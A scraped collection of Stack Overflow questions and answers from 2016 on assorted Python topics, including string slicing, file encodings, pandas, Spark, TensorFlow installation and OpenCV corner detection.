<p>Curious to find if people can do much faster than my implementation (using pure python, or whatever, but then just for your sake).</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] </code></pre> <p>The goal is to remove within those ranges. E.g. the characters at indices (5, 6, 7, 8, 9) should be ommited in the return value for match (5, 10).</p> <p>My implementation:</p> <pre><code>def remove_matches(sentence, matches): new_s = '' lbound = 0 for l, h in matches: news += sentence[lbound:l] lbound = h new_s += sentence[matches[-1][1]:] return new_s </code></pre> <p>Result: <code>'This me le sce where weove parts'</code></p> <p>Note that the matches will never overlap, you can make use of that fact.</p> <p>Actually, my main question is simply: can we not do it somehow in some vectorized way? I'm sure that numpy could, but I doubt that would be more efficient in this case.</p> <p>Benchmarks:</p> <pre><code>PascalvKooten: 1000000 loops, best of 3: 1.34 µs per loop Ted Klein Bergman (1): 1000000 loops, best of 3: 1.59 µs per loop Ted Klein Bergman (2): 100000 loops, best of 3: 2.58 µs per loop Prune: 100000 loops, best of 3: 2.05 µs per loop njzk2: 100000 loops, best of 3: 3.19 µs per loop </code></pre>
1
2016-08-01T23:45:50Z
38,727,550
<p>Instead of removing characters, I would define how to keep them, to make the manipulation easier:</p> <pre><code>sentence = "This is some example sentence where we remove parts" matches = [(5, 10), (13, 18), (22, 27), (38, 42)] chain = (None,) + sum(matches, ()) + (None,) # keep = ((m1, m2) for m1, m2 in zip(chain[::2], chain[1::2])) # list(keep) = [(None, 5), (10, 13), (18, 22), (27, 38), (42, None)] # or, keep = ((m1[1], m2[0]) for m1, m2 in zip([(None, None)] + matches, matches + [(None, None)])) return ''.join(sentence[x:y] for x, y in keep) </code></pre>
0
2016-08-02T18:03:16Z
[ "python", "optimization" ]
Python read non-ascii text file
38,709,789
<p>I am trying to load a text file, which contains some German letters with</p> <pre><code>content=open("file.txt","r").read() </code></pre> <p>which results in this error message</p> <pre><code>UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 26: ordinal not in range(128) </code></pre> <p>if I modify the file to contain only ASCII characters everything works as expected. </p> <p>Apperently using</p> <pre><code>content=open("file.txt","rb").read() </code></pre> <p>or</p> <pre><code>content=open("file.txt","r",encoding="utf-8").read() </code></pre> <p>both do the job. </p> <p>Why is it possible to read with "binary" mode and get the same result as with utf-8 encoding?</p>
1
2016-08-01T23:56:51Z
38,709,816
<p>In Python 3, using 'r' mode and not specifying an encoding just uses a default encoding, which in this case is ASCII. Using 'rb' mode reads the file as bytes and makes no attempt to interpret it as a string of characters.</p>
3
2016-08-02T00:00:28Z
[ "python", "utf-8" ]
Python read non-ascii text file
38,709,789
<p>I am trying to load a text file, which contains some German letters with</p> <pre><code>content=open("file.txt","r").read() </code></pre> <p>which results in this error message</p> <pre><code>UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 26: ordinal not in range(128) </code></pre> <p>if I modify the file to contain only ASCII characters everything works as expected. </p> <p>Apperently using</p> <pre><code>content=open("file.txt","rb").read() </code></pre> <p>or</p> <pre><code>content=open("file.txt","r",encoding="utf-8").read() </code></pre> <p>both do the job. </p> <p>Why is it possible to read with "binary" mode and get the same result as with utf-8 encoding?</p>
1
2016-08-01T23:56:51Z
38,709,942
<p>ASCII is limited to characters in the range of [0,128). If you try to decode a byte that is outside that range, one gets that error.</p> <p>When you read the string in as bytes, you're "widening" the acceptable range of character to [0,256). So your \0xc3 character <code>Ã</code> is now read in without error. But despite it seeming to work, it's still not "correct".</p> <p>If your strings are indeed unicode encoded, then the possibility exists that one will contain a multibyte character, that is, a character whose byte representation actually spans multiple bytes.</p> <p>It is in this case where the difference between reading a file as a byte string and properly decoding it will be quite apparent.</p> <p>A character like this: č</p> <p>Will be read in as two bytes, but properly decoded, will be one character:</p> <pre><code>bytes = bytes('č', encoding='utf-8') print(len(bytes)) # 2 print(len(bytes.decode('utf-8'))) # 1 </code></pre>
2
2016-08-02T00:18:09Z
[ "python", "utf-8" ]
Pandas dataframe values refuse to be evaluated as floats with `.apply(eval)`. Why?
38,709,791
<p>Using Python 3.4, I have a Pandas Dataframe</p> <pre><code>import pandas as pd df = pd.read_csv('file.csv') df.head() </code></pre> <p>giving</p> <pre><code> animal fraction_decimal 0 cat1 '2/7' 1 cat2 '4/55' 2 cat3 '22/195' 3 cat4 '6/13' .... </code></pre> <p>I would like to evaluate the values in column <code>fraction_decimal</code> to become floats, i.e. </p> <pre><code> animal fraction_decimal 0 cat1 0.2857142857142857 1 cat2 0.07272727272727272 2 cat3 0.11282051282051282 3 cat4 0.46153846153846156 .... </code></pre> <p>However, using <code>.apply(eval)</code> simply doesn't work. </p> <p>I tried</p> <pre><code>df['fraction_decimal'].apply(eval) </code></pre> <p>but this outputs:</p> <pre><code>0 2/7 1 4/55 2 22/195 3 6/13 .... Name: fraction_decimal, dtype: object </code></pre> <p>Why doesn't this work? How can this work properly? </p>
2
2016-08-01T23:57:07Z
38,709,838
<pre><code>eval("4/2") 2 </code></pre> <hr> <pre><code>eval("'4/2'") '4/2' </code></pre> <hr> <pre><code>eval(eval("'4/2/'")) 2 </code></pre> <p>You have quote characters in your strings. You need to strip them out.</p> <p>consider:</p> <pre><code>s = pd.Series(["'1/2'", "'3/4'", "'4/5'", "'6+5'", "'11-7'", "'9*10'"]) </code></pre> <p>Then:</p> <pre><code>s.str.replace(r'[\'\"]', '').apply(eval) 0 0.50 1 0.75 2 0.80 3 11.00 4 4.00 5 90.00 dtype: float64 </code></pre>
2
2016-08-02T00:03:31Z
[ "python", "python-3.x", "pandas" ]
Python 2.7 crashes when importing PyQt4.QtDeclarative or PyQt4.Qt on Ubuntu
38,709,817
<p>Some time ago (months?) the program <code>rqt_plot</code> started crashing on startup (SIGSEGV) on my machine. I finally tracked it down a little deeper and found that the problem occurs while python is trying to import <code>PyQt4.QtDeclarative</code>. Unfortunately I don't remember when this started happening, and my Internet searches have turned up nothing. Any ideas what's going wrong? I suspect an incompatible package update somewhere along the way, but have no idea how to find the root cause.</p> <p>Here's a simple session transcript:</p> <pre><code>$ python Python 2.7.6 (default, Jun 22 2015, 17:58:13) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. &gt;&gt;&gt; from PyQt4 import QtDeclarative Segmentation fault (core dumped) $ </code></pre> <p>Here's some system information:</p> <pre><code>$ uname -a Linux [HOSTNAME] 3.13.0-63-generic #103-Ubuntu SMP Fri Aug 14 21:42:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux $ echo $PYTHONPATH $ which python /usr/bin/python $ ls -l /usr/bin/python lrwxrwxrwx 1 root root 9 Jan 8 2015 /usr/bin/python -&gt; python2.7 </code></pre> <p>Follow-up:</p> <p>I found later that I had the same problem (Segmentation fault) when doing <code>import PyQt4.Qt</code> as well.</p>
1
2016-08-02T00:00:29Z
39,111,262
<p>It can be difficult to diagnose a segfault when the only error message is</p> <pre><code>Segmentation fault (core dumped) </code></pre> <p>In this case, because reinstallation of <code>python-qt4</code> does not take much time at all, I would recommend you do it by running:</p> <pre><code>sudo apt-get install --reinstall python-qt4 </code></pre> <p>Edit: It looks like OP encountered another segfault when doing <code>import PyQt4.Qt</code>. This is probably related to <code>python-sip</code>, which is a dependency of <code>python-pyqt4</code>. To get rid of the segfault, reinstall <code>python-sip</code> by running:</p> <pre><code>sudo apt-get install --reinstall python-sip </code></pre>
1
2016-08-23T21:53:03Z
[ "python", "ubuntu", "pyqt4", "python-sip", "qtdeclarative" ]
Syntax error when defining 2 functions in python
38,709,931
<p>I've <em>very</em> new to programming so sorry if this is a stupid question, but I'm trying to make a program with multiple functions, but whenever I attempt to define one it comes up with an error.</p> <pre><code>def startUp(): promptName() def promptName(): name = input("Hello. Please enter your name: ") startUp() SyntaxError: invalid syntax </code></pre> <p>If it helps the def part in def promptName(): is highlighted red.</p>
1
2016-08-02T00:17:04Z
38,710,002
<p>The code you posted here is absolutely fine (regarding the syntax). Please check whether you have forgotton a colon or so in you original code.</p> <p>Regarding the code: If you define a variable (like name within promptName()) within a function, you cannot access that variable from outside the function. To make use of it, you have to return it or state it explicitly as global variable.</p>
1
2016-08-02T00:24:45Z
[ "python" ]
Syntax error when defining 2 functions in python
38,709,931
<p>I've <em>very</em> new to programming so sorry if this is a stupid question, but I'm trying to make a program with multiple functions, but whenever I attempt to define one it comes up with an error.</p> <pre><code>def startUp(): promptName() def promptName(): name = input("Hello. Please enter your name: ") startUp() SyntaxError: invalid syntax </code></pre> <p>If it helps the def part in def promptName(): is highlighted red.</p>
1
2016-08-02T00:17:04Z
38,710,047
<p>I'd bet you're trying to paste the entire thing into a Python interpreter session. The command line interpreter needs things entered one block at a time, so try pasting the <code>startUp</code> function, hit enter, then <code>promptName</code> and enter, and then run the whole thing with the last line.</p> <p>Alternatively, save it all as a .py file and run the file.</p>
5
2016-08-02T00:30:10Z
[ "python" ]
Group by hours and plot in Bokeh
38,709,991
<p>I am trying to get a plot like a stock data in Bokeh like in the link <a href="http://bokeh.pydata.org/en/latest/docs/gallery/stocks.html" rel="nofollow">http://bokeh.pydata.org/en/latest/docs/gallery/stocks.html</a></p> <pre><code>2004-01-05,00:00:00,01:00:00,Mon,20504,792 2004-01-05,01:00:00,02:00:00,Mon,16553,783 2004-01-05,02:00:00,03:00:00,Mon,18944,790 2004-01-05,03:00:00,04:00:00,Mon,17534,750 2004-01-06,00:00:00,01:00:00,Tue,17262,747 2004-01-06,01:00:00,02:00:00,Tue,19072,777 2004-01-06,02:00:00,03:00:00,Tue,18275,785 </code></pre> <p>I want to use column 2:startTime and 5:count and I want to group by column <code>day</code> and sum the <code>counts</code> in respective hours. </p> <p>code: Does not give the output </p> <pre><code>import numpy as np import pandas as pd #from bokeh.layouts import gridplot from bokeh.plotting import figure, show, output_file data = pd.read_csv('one_hour.csv') data.column = ['date', 'startTime', 'endTime', 'day', 'count', 'unique'] p1 = figure(x_axis_type='startTime', y_axis_type='count', title="counts per hour") p1.grid.grid_line_alpha=0.3 p1.xaxis.axis_label = 'startTime' p1.yaxis.axis_label = 'count' output_file("count.html", title="time_graph.py") show(gridplot([[p1]], plot_width=400, plot_height=400)) # open a browser </code></pre> <p>Reading the column and plot isn't any problem but applying group by and sum operations on the column data is something I am not able to perform. </p> <p>Appreciate the help, Thanks ! </p>
0
2016-08-02T00:23:50Z
38,710,974
<p>Sounds like this is what you need:</p> <pre><code>data.groupby('startTime')['count'].sum() </code></pre> <p>Output:</p> <pre><code>00:00:00 37766 01:00:00 35625 02:00:00 37219 03:00:00 17534 </code></pre>
1
2016-08-02T02:39:00Z
[ "python", "pandas", "plot", "graph", "bokeh" ]
Towards limiting the big RDD
38,710,018
<p>I am reading many images and I would like to work on a tiny subset of them for developing. As a result I am trying to understand how <a href="/questions/tagged/spark" class="post-tag" title="show questions tagged &#39;spark&#39;" rel="tag">spark</a> and <a href="/questions/tagged/python" class="post-tag" title="show questions tagged &#39;python&#39;" rel="tag">python</a> could make that happen:</p> <pre><code>In [1]: d = sqlContext.read.parquet('foo') In [2]: d.map(lambda x: x.photo_id).first() Out[2]: u'28605' In [3]: d.limit(1).map(lambda x: x.photo_id) Out[3]: PythonRDD[31] at RDD at PythonRDD.scala:43 In [4]: d.limit(1).map(lambda x: x.photo_id).first() // still running... </code></pre> <p>..so what is happening? I would expect the <a href="https://spark.apache.org/docs/latest/api/python/pyspark.sql.html?highlight=limit#pyspark.sql.DataFrame.limit" rel="nofollow">limit()</a> to run much faster than what we had in <code>[2]</code>, but that's not the case<sup>*</sup>.</p> <p>Below I will describe my understanding, and please correct me, since obviously I am missing something:</p> <ol> <li><p><code>d</code> is an RDD of pairs (I know that from the schema) and I am saying with the map function: </p> <p>i) Take every pair (which will be named <code>x</code> and give me back the <code>photo_id</code> attribute).</p> <p>ii) That will result in a new (anonymous) RDD, in which we are applying the <code>first()</code> method, which I am not sure how it works<sup>$</sup>, but should give me the first element of that anonymous RDD.</p></li> <li><p>In <code>[3]</code>, we limit the <code>d</code> RDD to 1, which means that despite <code>d</code> has many elements, use only 1 and apply the map function to that one element only. The <code>Out [3]</code> should be the RDD created by the mapping.</p></li> <li>In <code>[4]</code>, I would expect to follow the logic of <code>[3]</code> and just print the one and only element of the limited RDD...</li> </ol> <hr> <p>As expected, after looking at the monitor, [4] seems to process the <strong>whole dataset</strong>, while the others aren't, so it seems that I am not using <code>limit()</code> correctly, or that that's not what am I looking for:</p> <p><a href="http://i.stack.imgur.com/VvGZ3.png" rel="nofollow"><img src="http://i.stack.imgur.com/VvGZ3.png" alt="enter image description here"></a></p> <hr> <p>Edit:</p> <pre><code>tiny_d = d.limit(1).map(lambda x: x.photo_id) tiny_d.map(lambda x: x.photo_id).first() </code></pre> <p>The first will give a <code>PipelinedRDD</code>, which as described <a href="http://billchambers.me/tutorials/2014/12/06/getting-started-with-apache-spark.html" rel="nofollow">here</a>, it will not actually do any <em>action</em>, just a transformation.</p> <p>However, the second line will also process the whole dataset (as a matter of fact, the number of Tasks now are as many as before, plus one!).</p> <hr> <p>*<sub>[2] executed instantly, while [4] is still running and >3h have passed..</sub></p> <p>$<sub>I couldn't find it in the documentation, because of the name.</sub></p>
3
2016-08-02T00:26:30Z
38,758,582
<p>Based on your code, here is simpler test case on Spark 2.0</p> <pre><code>case class my (x: Int) val rdd = sc.parallelize(0.until(10000), 1000).map { x =&gt; my(x) } val df1 = spark.createDataFrame(rdd) val df2 = df1.limit(1) df1.map { r =&gt; r.getAs[Int](0) }.first df2.map { r =&gt; r.getAs[Int](0) }.first // Much slower than the previous line </code></pre> <p>Actually, Dataset.first is equivalent to Dataset.limit(1).collect, so check the physical plan of the two cases:</p> <pre><code>scala&gt; df1.map { r =&gt; r.getAs[Int](0) }.limit(1).explain == Physical Plan == CollectLimit 1 +- *SerializeFromObject [input[0, int, true] AS value#124] +- *MapElements &lt;function1&gt;, obj#123: int +- *DeserializeToObject createexternalrow(x#74, StructField(x,IntegerType,false)), obj#122: org.apache.spark.sql.Row +- Scan ExistingRDD[x#74] scala&gt; df2.map { r =&gt; r.getAs[Int](0) }.limit(1).explain == Physical Plan == CollectLimit 1 +- *SerializeFromObject [input[0, int, true] AS value#131] +- *MapElements &lt;function1&gt;, obj#130: int +- *DeserializeToObject createexternalrow(x#74, StructField(x,IntegerType,false)), obj#129: org.apache.spark.sql.Row +- *GlobalLimit 1 +- Exchange SinglePartition +- *LocalLimit 1 +- Scan ExistingRDD[x#74] </code></pre> <p>For the first case, it is related to an optimisation in the CollectLimitExec physical operator. That is, it will first fetch the first partition to get limit number of row, 1 in this case, if not satisfied, then fetch more partitions, until the desired limit is reached. So generally, if the first partition is not empty, only the first partition will be calculated and fetched. Other partitions will even not be computed.</p> <p>However, in the second case, the optimisation in the CollectLimitExec does not help, because the previous limit operation involves a shuffle operation. All partitions will be computed, and running LocalLimit(1) on each partition to get 1 row, and then all partitions are shuffled into a single partition. CollectLimitExec will fetch 1 row from the resulted single partition.</p>
3
2016-08-04T04:38:56Z
[ "python", "hadoop", "apache-spark", "pyspark", "distributed-computing" ]
Storing list in a pandas DataFrame column
38,710,061
<p>I am trying to do some text processing using NLTK and Pandas. </p> <p>I have DataFrame with column 'text'. I want to add column 'text_tokenized' that will be stored as a nested list.</p> <p>My code for tokenizing text is: </p> <pre><code>def sent_word_tokenize(text): text = unicode(text, errors='replace') sents = sent_tokenize(text) tokens = map(word_tokenize, sents) return tokens </code></pre> <p>Currently, I am trying to apply this function as following:</p> <pre><code>df['text_tokenized'] = df.apply(lambda row: sent_word_tokenize(row.text), axis=1) </code></pre> <p>Which gives me error:</p> <pre><code>ValueError: Shape of passed values is (100, 3), indices imply (100, 21) </code></pre> <p>Not sure how to fix it and what is wrong here.</p>
0
2016-08-02T00:32:33Z
38,711,386
<p>Solved my own question by using different axis:</p> <p>Instead of:</p> <pre><code>df['text_tokenized'] = df.apply(lambda row: sent_word_tokenize(row.text), axis=1) </code></pre> <p>I used:</p> <pre><code>df['text_tokenized'] = df.text.apply(lambda text: sent_word_tokenize(text)) </code></pre> <p>Although I am not sure why it works and I really appreciate if somebody could explain it to me. </p>
0
2016-08-02T03:38:45Z
[ "python", "pandas", "dataframe", "nlp", "nltk" ]
How to reduce elif statement use?
38,710,085
<p>If I'm making a program that alloys you to translate words, is there a way to not use elif every tine and just write words to translate. This is what ive got now!</p> <pre><code>print("English to Exrian Dictionary") search = input("Enter the word you would like to translate: ").lower() if search == "ant": print("Ulf") elif search == "back": print("Zuwp") elif search == "ban": print("Zul") elif search == "bat": print("Zuf") elif search == "bye": print("Zio") elif search == "wumohu": print("Camera") elif search == "car": print("Wuh") elif search == "carrot": print("Wuhhef") elif search == "cat": print("Wuf") elif search == "doctor": print("vewfeh") elif search == "dog": print("Ves") elif search == "duck": print("Vawp") elif search == "egg": print("Oss") elif search == "enter": print("Olfoh") elif search == "experiment": print("Oxkohymolf") elif search == "fat": print("Tuf") elif search == "flower": print("Tnecoh") elif search == "goal": print("Seun") elif search == "goat": print("Seuf") elif search == "hand": print("Rulv") elif search == "hat": print("Ruf") elif search == "hello": print("Ronne") elif search == "hello": print("Ronne") elif search == "house": print("Reago") elif search == "hello": print("Ronne") elif search == "information": print("Yltehmufyel") elif search == "inspiration": print("Ylgkyhufyel") elif search == "lawyer": print("Nucioh") elif search == "no": print("Le") elif search == "yes": print("Iog") else: print("No results were found for '" + search + "'") </code></pre>
0
2016-08-02T00:35:56Z
38,710,157
<p>Use a <code>dict</code> to map each input to the appropriate output.</p> <pre><code>print("English to Exrian Dictionary") d = {"ant": "Ulf", "back": "Zuwp", # etc } search = input("Enter the word you would like to translate: ").lower() if search in d: print(d[search]) else: print("No results were found for '" + search + "'") </code></pre>
2
2016-08-02T00:45:11Z
[ "python" ]
How to reduce elif statement use?
38,710,085
<p>If I'm making a program that alloys you to translate words, is there a way to not use elif every tine and just write words to translate. This is what ive got now!</p> <pre><code>print("English to Exrian Dictionary") search = input("Enter the word you would like to translate: ").lower() if search == "ant": print("Ulf") elif search == "back": print("Zuwp") elif search == "ban": print("Zul") elif search == "bat": print("Zuf") elif search == "bye": print("Zio") elif search == "wumohu": print("Camera") elif search == "car": print("Wuh") elif search == "carrot": print("Wuhhef") elif search == "cat": print("Wuf") elif search == "doctor": print("vewfeh") elif search == "dog": print("Ves") elif search == "duck": print("Vawp") elif search == "egg": print("Oss") elif search == "enter": print("Olfoh") elif search == "experiment": print("Oxkohymolf") elif search == "fat": print("Tuf") elif search == "flower": print("Tnecoh") elif search == "goal": print("Seun") elif search == "goat": print("Seuf") elif search == "hand": print("Rulv") elif search == "hat": print("Ruf") elif search == "hello": print("Ronne") elif search == "hello": print("Ronne") elif search == "house": print("Reago") elif search == "hello": print("Ronne") elif search == "information": print("Yltehmufyel") elif search == "inspiration": print("Ylgkyhufyel") elif search == "lawyer": print("Nucioh") elif search == "no": print("Le") elif search == "yes": print("Iog") else: print("No results were found for '" + search + "'") </code></pre>
0
2016-08-02T00:35:56Z
38,710,161
<p>This might help:</p> <pre><code>def translate(item): try: return { 'ant': "Ulf", 'back': "Zuwp", 'ban': "Zul" }[item] except KeyError as e: return "No results were found for '" + search + "'" print("English to Exrian Dictionary") search = raw_input("Enter the word you would like to translate: ").lower() print translate(search) </code></pre>
0
2016-08-02T00:45:20Z
[ "python" ]
How to reduce elif statement use?
38,710,085
<p>If I'm making a program that alloys you to translate words, is there a way to not use elif every tine and just write words to translate. This is what ive got now!</p> <pre><code>print("English to Exrian Dictionary") search = input("Enter the word you would like to translate: ").lower() if search == "ant": print("Ulf") elif search == "back": print("Zuwp") elif search == "ban": print("Zul") elif search == "bat": print("Zuf") elif search == "bye": print("Zio") elif search == "wumohu": print("Camera") elif search == "car": print("Wuh") elif search == "carrot": print("Wuhhef") elif search == "cat": print("Wuf") elif search == "doctor": print("vewfeh") elif search == "dog": print("Ves") elif search == "duck": print("Vawp") elif search == "egg": print("Oss") elif search == "enter": print("Olfoh") elif search == "experiment": print("Oxkohymolf") elif search == "fat": print("Tuf") elif search == "flower": print("Tnecoh") elif search == "goal": print("Seun") elif search == "goat": print("Seuf") elif search == "hand": print("Rulv") elif search == "hat": print("Ruf") elif search == "hello": print("Ronne") elif search == "hello": print("Ronne") elif search == "house": print("Reago") elif search == "hello": print("Ronne") elif search == "information": print("Yltehmufyel") elif search == "inspiration": print("Ylgkyhufyel") elif search == "lawyer": print("Nucioh") elif search == "no": print("Le") elif search == "yes": print("Iog") else: print("No results were found for '" + search + "'") </code></pre>
0
2016-08-02T00:35:56Z
38,710,163
<p>You can just use a <code>dict</code> object. </p> <p>Example:</p> <pre><code>words = {'ant': 'Ulf', 'back': 'Zuwp', 'ban' : 'Zul'} # etc try: print(words[search]) except KeyError as e: print("No results were found for '" + search + "'") </code></pre>
0
2016-08-02T00:45:26Z
[ "python" ]
How to compare (x,y) points in array to extract rectangular shape in python
38,710,103
<p>I have a numpy array that was extracted from an image running the harris corner detection algorithm from opencv and I am trying to sort out four points that resembles a rectangle.</p> <p>The following is the set of points:</p> <pre><code>numpy.array([[194, 438], [495, 431], [512, 519], [490, 311], [548, 28], [407, 194], [181, 698], [169, 93], [408, 99], [221, 251], [395, 692], [574, 424], [431, 785], [538, 249], [397, 615], [306, 237]]) </code></pre> <p>What would be the best method to compare the points for angles in quadrants within a slight deviation of 90 along with comparing how parallel lines between top and bottom points and left and right points are to return the four best possible candidates?</p> <p><strong>Edit</strong></p> <p>The image is roughly aligned with the rectangle so there is no significant rotation or distortion. The deviation allowance for perspective transformation and rough capturing I think can be +/- 10 degrees</p> <p>Below is an image of the plotted lines with x and y locations. The desired corners are top-left (169,93), top-right (408,99), bottom-right (395,692), and bottom-left (181,698) <a href="http://i.stack.imgur.com/iKhCV.png" rel="nofollow"><img src="http://i.stack.imgur.com/iKhCV.png" alt="enter image description here"></a></p>
3
2016-08-02T00:37:47Z
38,754,407
<p>This is probably not the most efficient way to go about finding the corners but I split the points into four quadrants like so:</p> <pre><code>yThreshM = height / 2 xThreshM = width / 2 tl = dst[ ((dst[:,1]&lt;yThreshM) &amp; (dst[:,0]&lt;xThreshM)) ] tr = dst[ ((dst[:,1]&lt;yThreshM) &amp; (dst[:,0]&gt;xThreshM)) ] br = dst[ ((dst[:,1]&gt;yThreshM) &amp; (dst[:,0]&gt;xThreshM)) ] bl = dst[ ((dst[:,1]&gt;yThreshM) &amp; (dst[:,0]&lt;xThreshM)) ] </code></pre> <p>Then I grouped each section into their respective angles for the top left and the bottom right:</p> <pre><code>tla = [bl, tl, tr] bra = [tr, br, bl] tlap = list(it.product(*tla)) brap = list(it.product(*bra)) </code></pre> <p>Then I calculated the direction of the vertical lines and removed items not within a given perpendicular threshold. Then I calculated the angles and filtered out the items not within a threshold +/- of 90 degrees.</p> <p>Lastly, I checked that the opposite end points of the results of iterating through <code>tlap</code> and <code>brap</code> matched to get the rest of the points and to verify the <code>tl</code> and <code>br</code> points.</p>
0
2016-08-03T22:05:00Z
[ "python", "opencv", "numpy", "scipy" ]
How to install SciPy on an Azure C# webapp?
38,710,158
<p>I have a website built with .Net Core 1.0 (C#) and deployed it to Azure WebApp (32 bit mode).</p> <p>The app uses some python scripts and I was able to create a virtual env (3.4.1) and successfully installed numpy (1.11.0) with <code>pip install numpy</code>. </p> <p>The problem I'm facing is that I can not install SciPy. Trying <code>pip install scipy</code> fails because of compiler issues which I understand. </p> <p>Next try was to download Christoph Gohlke's Python Extension Packages for Windows (<a href="http://www.lfd.uci.edu/~gohlke/pythonlibs/#scipy" rel="nofollow">from here</a>), copied it to my web app and tried to run 'pip install scipy-0.18.0-cp34-cp34m-win32.whl' without success. The error I get is:</p> <pre><code>scipy-0.18.0-cp34-cp34m-win32.whl is not a supported wheel on this platform. Storing debug log for failure in D:\home\pip\pip.log </code></pre> <p>pip.log contains the following:</p> <pre><code>scipy-0.18.0-cp34-cp34m-win32.whl is not a supported wheel on this platform. Exception information: Traceback (most recent call last): File "D:\home\site\wwwroot\env\lib\site-packages\pip\basecommand.py", line 122, in main status = self.run(options, args) File "D:\home\site\wwwroot\env\lib\site-packages\pip\commands\install.py", line 257, in run InstallRequirement.from_line(name, None)) File "D:\home\site\wwwroot\env\lib\site-packages\pip\req.py", line 167, in from_line raise UnsupportedWheel("%s is not a supported wheel on this platform." % wheel.filename) pip.exceptions.UnsupportedWheel: scipy-0.18.0-cp34-cp34m-win32.whl is not a supported wheel on this platform. </code></pre> <p>I have tried to create a requirement.txt file as stated in <a href="https://azure.microsoft.com/en-us/documentation/articles/web-sites-python-configure/#troubleshooting---package-installation" rel="nofollow">Troubleshooting - Package Installation</a>. However since it's not a python app, but instead a dotNet Core C#, it doesn't seem to care about the requirement.txt file and don't see anything about it in the deploy.cmd file.</p>
1
2016-08-02T00:45:16Z
38,716,606
<p>@mdeblois, your understanding is correct, please see the offical explaination below.</p> <blockquote> <p>Some packages may not install using pip when run on Azure. It may simply be that the package is not available on the Python Package Index. It could be that a compiler is required (a compiler is not available on the machine running the web app in Azure App Service).</p> </blockquote> <p>For this case, the solution is that you can refer to the section <a href="https://azure.microsoft.com/en-us/documentation/articles/web-sites-python-configure/#troubleshooting---package-installation" rel="nofollow">Troubleshooting - Package Installation</a> of the offical tutorial to know how to deal with.</p>
1
2016-08-02T09:27:03Z
[ "python", "azure", "scipy", "azure-web-app-service" ]
Python - Download file over HTTP and detect filetype automatically
38,710,238
<p>I want download a file via HTTP, but all the examples online involve fetching the data and then putting it in a local file. The problem with this is that you need to explicitly set the filetype of the local file.</p> <p>I want to download a file but I won't know the filetype of what I'm downloading.</p> <p>This is what I currently have:</p> <pre><code>urllib.urlretrieve(fetch_url,output.csv) </code></pre> <p>But if I download, say a XML file it will be CSV. Is there anyway to get python to detect the file that I get sent from a URL like: <a href="http://asassaassa.com/assaas?abc=123" rel="nofollow">http://asassaassa.com/assaas?abc=123</a> </p> <p>Say the above URL gives me an XML I want python to detect that.</p>
0
2016-08-02T00:56:47Z
38,710,582
<p>You can use <a href="https://github.com/ahupp/python-magic" rel="nofollow">python-magic</a> to detect file type. It can be installed via "pip install python-magic". </p> <p>I assume you are using python 2.7 since you are calling urlretreieve. The example is geared to 2.7, but it is easily adapted.</p> <p>This is a working example:</p> <pre><code>import mimetypes # Detects mimetype import magic # Uses magic numbers to detect file type, and does so much better than the built in mimetypes import urllib # Your library import os # for renaming your file mime = magic.Magic(mime=True) output = "output" # Your file name without extension urllib.urlretrieve("https://docs.python.org/3.0/library/mimetypes.html", output) # This is just an example url mimes = mime.from_file(output) # Get mime type ext = mimetypes.guess_all_extensions(mimes)[0] # Guess extension os.rename(output, output+ext) # Rename file </code></pre>
1
2016-08-02T01:44:16Z
[ "python", "http" ]
'Library not loaded: @rpath/libcudart.7.5.dylib' TensorFlow Error on Mac
38,710,339
<p>I'm using OS X El Capitan (10.11.4).</p> <p>I just downloaded TensorFlow using the pip install instructions <a href="https://www.tensorflow.org/versions/r0.10/get_started/os_setup.html">here</a>.</p> <p>Everything went pretty smoothly, though I did get a few warning messages like:</p> <p><code>The directory '/Users/myusername/Library/Caches/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want the -H flag.</code></p> <p>and</p> <p><code>You are using pip version 6.0.8, however version 8.1.2 is available.</code> Even though I just installed pip.</p> <p>Then, when I tested TensorFlow in Python, I got the error:</p> <pre><code>&gt;&gt;&gt; import tensorflow as tf Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/__init__.py", line 23, in &lt;module&gt; from tensorflow.python import * File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/__init__.py", line 48, in &lt;module&gt; from tensorflow.python import pywrap_tensorflow File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 28, in &lt;module&gt; _pywrap_tensorflow = swig_import_helper() File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/pywrap_tensorflow.py", line 24, in swig_import_helper _mod = imp.load_module('_pywrap_tensorflow', fp, pathname, description) File "/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/imp.py", line 243, in load_module return load_dynamic(name, filename, file) ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so, 10): Library not loaded: @rpath/libcudart.7.5.dylib Referenced from: /Library/Frameworks/Python.framework/Versions/3.4/lib/python3.4/site-packages/tensorflow/python/_pywrap_tensorflow.so Reason: image not found </code></pre> <p>Now, when I try to do <code>pip uninstall tensorflow-0.10.0rc0</code> it tells me that it's not installed.</p> <p>The closest thing I've found to resembling this problem is <a href="https://github.com/tensorflow/tensorflow/issues/2278">this issue</a> in the TensorFlow GitHub docs (which I have not tried).</p> <p>How can I uninstall whatever it did install and get TensorFlow up and running correctly?</p>
6
2016-08-02T01:12:01Z
38,712,022
<p>This error message is displayed if you install the GPU-enabled Mac OS version of TensorFlow (available from release 0.10 onwards) on a machine that does not have CUDA installed.</p> <p>To fix the error, install the CPU version for Python 2.7 or 3.x, as follows:</p> <pre><code># Mac OS X, CPU only, Python 2.7: $ export TF_BINARY_URL=https://storage.googleapis.com/tensorflow/mac/cpu/tensorflow-0.10.0rc0-py2-none-any.whl $ sudo pip install --upgrade $TF_BINARY_URL # Mac OS X, CPU only, Python 3.4 or 3.5: $ export TF_BINARY_URL=https://storage.googleapis.com/tensorflow/mac/cpu/tensorflow-0.10.0rc0-py3-none-any.whl $ sudo pip3 install --upgrade $TF_BINARY_URL </code></pre>
10
2016-08-02T04:55:05Z
